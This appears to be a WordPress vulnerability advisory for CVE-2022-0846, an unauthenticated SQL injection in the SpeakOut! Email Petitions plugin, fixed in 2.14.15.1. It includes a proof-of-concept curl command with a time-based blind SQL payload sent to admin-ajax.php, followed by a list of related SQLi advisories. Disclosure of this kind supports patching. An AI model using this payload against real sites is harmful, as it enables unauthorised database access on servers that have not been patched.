SpeakOut! Email Petitions < 2.14.15.1 – Unauthenticated SQLi | CVE 2022-0846 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the id parameter before using it in a SQL statement via the dk_speakout_sendmail AJAX action, leading to an SQL Injection exploitable by unauthenticated users

Proof of Concept

Create a new email petition (/wp-admin/admin.php?page=dk_speakout_addnew), check [x] Do not send email (only collect signatures), enter a title and hit save.

Then as unauthenticated, curl 'https://example.com/wp-admin/admin-ajax.php' --data 'action=dk_speakout_sendmail&id=11 AND (SELECT 5023 FROM (SELECT(SLEEP(5)))Fvrh)-- VoFu'

Affects Plugins

Fixed in 2.14.15.1

References

CVE

Classification

Type

SQLI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

cydave

Submitter

cydave

Submitter website

https://cyllective.com/

Submitter twitter

Verified

Yes

WPVDB ID

b030296d-688e-44a4-a48a-140375f2c5f4

Timeline

Publicly Published

2022-03-07 (about 3 years ago)

Added

2022-03-07 (about 3 years ago)

Last Updated

2022-04-08 (about 3 years ago)

Other

Published

Title

Published

2025-10-14

Title

External Login <= 1.11.2 - Unauthenticated SQL Injection via log

Published

2024-02-27

Title

WP eCommerce <= 3.15.1 - Unauthenticated SQL Injection

Published

2025-05-05

Title

Slider & Popup Builder by Depicter < 3.6.2 - Unauthenticated SQLi via 's' Parameter

Published

2023-10-30

Title

Up down image slideshow gallery < 12.1 - Authenticated (Subscriber+) SQL Injection via Shortcode

Published

2021-04-26

Title

Car Seller - Auto Classifieds Script <= 2.1.0 - Unauthenticated SQL Injection